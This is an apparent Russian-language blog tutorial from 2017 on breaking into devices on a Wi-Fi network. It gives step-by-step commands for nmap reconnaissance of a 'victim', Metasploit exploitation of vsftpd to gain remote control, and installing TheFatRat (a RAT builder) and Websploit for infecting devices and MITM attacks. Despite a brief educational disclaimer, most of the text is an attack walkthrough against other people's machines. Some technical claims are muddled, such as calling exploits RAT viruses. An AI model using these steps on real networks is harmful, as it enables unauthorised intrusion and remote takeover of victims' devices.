Как взламывают Wi-Fi сети?

25.12.2017

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.

В данной статье мы рассмотрим способ взлома устройств через WiFi сеть при помощи эксплоитов. Эксплойт- это программа, при установке которой вы сможете удалённо управлять устройством жертвы. Вы сможете копировать, удалять, изменять файлы, а так же проводить махинации с самой системой, например как её выключение, перезагрузка и т.п. Фактически Exploits- это те же самые RAT-вирусы дающие полный контроль над системой машины. Передаются данные эксплоиты при помощи WiFi через открытые порты в машине жертвы.

Мы рассмотрим один из множества примеров взлома устройств при помощи эксплоитов.

Приступим к данной махинации.

В основном при совершении данной атаки используется связка двух программ: nmap+metasploit.

1.Nmap- выявляет в сети устройства, а так же предоставляет информацию об открытых портах.

2.Metasploit- собственно основа данного метода при помощи которой вы будете заражать эксплоитами машину-цель.

Начнём практику.

root@571:~#msfconsole (в одном окне терминала)
root@571:~#nmap 192.168.1.1(<--IP-роутера)/24 (в другом окне терминала)
root@571:~#nmap 192.168.1.4(<--IP_жертвы) -sV -O -v -A

(При помощи данной команды мы узнаем открытые порты данной машины через которые будут проникать эксплоиты)

(В открывшемся окне metasploit:)

msf>search vsftpd (<-- указываете данную программу, она будет показана в nmap напротив одного из открытых портов под таблицей "VERSIONS")

...Если программа найдёт данный эксплоит, тогда выведится строка в которой будет путь к файлу...

msf>use exploit/unix/ftp/vsftpd (<--путь к файлу)
msf exploit(vsftpd)>show options

...Строка напротив RHOST будет пуста и в неё надо будет вписать IP-жертвы...

msf exploit(vsftpd)>set RHOST 192.168.1.4 (<--IP-жертвы)
msf exploit(vsftpd)>exploit (<-- Запуск программы)

В итоге, если нашлись сессии (sessions) вас автоматически подключит к удалённому доступу.

Можете воспользоваться командой help, чтобы узнать все функции.

Ещё есть иной способ искать нужные эксплоиты по ОС:

root@571:~#searchsploit Windows (<--Указываем Операционную Систему)

Так же можно упомянуть о таких программах как TheFatRat и Websploit. Их нет в оригинальной сборке Kali, так что придётся их докачивать отдельно. Давайте разберём, что представляют собой данные программы.

1) TheFatRat- это программа создания RAT-вируса или же Эксплоитов.

2) Websploit- многофункциональная программа для нахождения уязвимостей в сайтах, заражении устройств в WiFi сети эксплоитами и проведении MITM атак.

1) Установка TheFatRat:

root@571:~#git clone https://github.com/screetsec/TheFatRat.git
root@571:~#cd TheFatRat
root@571:~#cd setup
root@571:~#chmod +x setup.sh && ./setup.sh
root@571:~#cd TheFatRat
root@571:~#chmod +x powerfull.sh
root@571:~#./fatrat (<--Запуск программы)

2) Установка Websploit:

root@571:~#apt install websploit
root@571:~#websploit (<--Запуск программы)
wsf>help
wsf>show modules

Далее вы уже можете сами понять что и как действовать, если обладаете достаточными знаниями английского языка, т.к. программы полностью автоматизированы. Если же вы плохо знаете английский, тогда можете посмотреть в YouTube любую инструкцию связанную с данной программой.